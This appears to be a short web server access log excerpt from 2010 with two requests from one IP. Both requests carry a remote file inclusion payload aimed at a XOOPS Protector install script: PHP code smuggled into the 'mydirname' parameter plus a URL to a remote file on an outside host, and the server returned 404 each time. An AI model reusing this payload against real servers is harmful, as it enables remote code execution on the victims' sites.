200.93.147.154 - - [12/Mar/2010:09:20:05 -0800] "GET /logs/access_091122.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:20:07 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
